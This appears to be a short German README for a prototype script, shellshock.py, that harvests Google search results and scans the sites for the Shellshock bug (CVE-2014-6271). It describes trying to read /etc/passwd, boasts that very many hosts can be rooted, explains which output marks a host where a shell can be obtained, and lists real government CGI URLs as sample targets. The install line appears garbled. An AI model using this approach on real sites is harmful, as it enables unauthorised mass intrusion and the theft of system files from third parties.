
Nutze Google, um Websites auf "ShellShock" (CVE-2014-6271) zu scannen.
sudo pip install shellIch nutze Google, um die ersten 1000 Seiten zu durchsuchen und versuche, /etc/passwd zu erhalten.
Nach dem Testen gibt es sehr viele viele viele Hosts, die gerootet werden können!!!!
Übrigens, das ist nur ein Prototyp, es gibt Fehlalarme.
Ausgabe wie folgt:
Wenn das zweite Feld !!! ist, dann kannst du eine Shell bekommen!
$ python shellshock.py
0 --- http://nomad3.ncep.noaa.gov/cgi-bin/pdisp_sst.sh
1 --- http://nomad5.ncep.noaa.gov/cgi-bin/pdisp_gfs.sh?ctlfile=gfs_00z.ctl&povlp=noovlp&ptype=map&dir